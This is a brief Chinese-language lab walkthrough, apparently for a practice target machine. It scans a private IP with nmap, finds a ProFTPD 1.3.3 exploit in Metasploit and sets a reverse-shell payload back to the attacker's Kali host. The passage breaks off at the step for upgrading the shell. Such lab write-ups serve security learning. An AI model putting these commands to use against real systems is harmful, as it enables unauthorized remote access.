扫描IP
端口扫描
nmap -p- -A 192.168.111.139
getshell
根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内
先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)
search proftpd 1.3.3
由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;
提权
查看要设置的参数(show options)
set payload cmd/unix/reverse
set rhosts 192.168.111.139 #靶机ip
set lhost 192.168.111.147 #kali的ip
run
优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)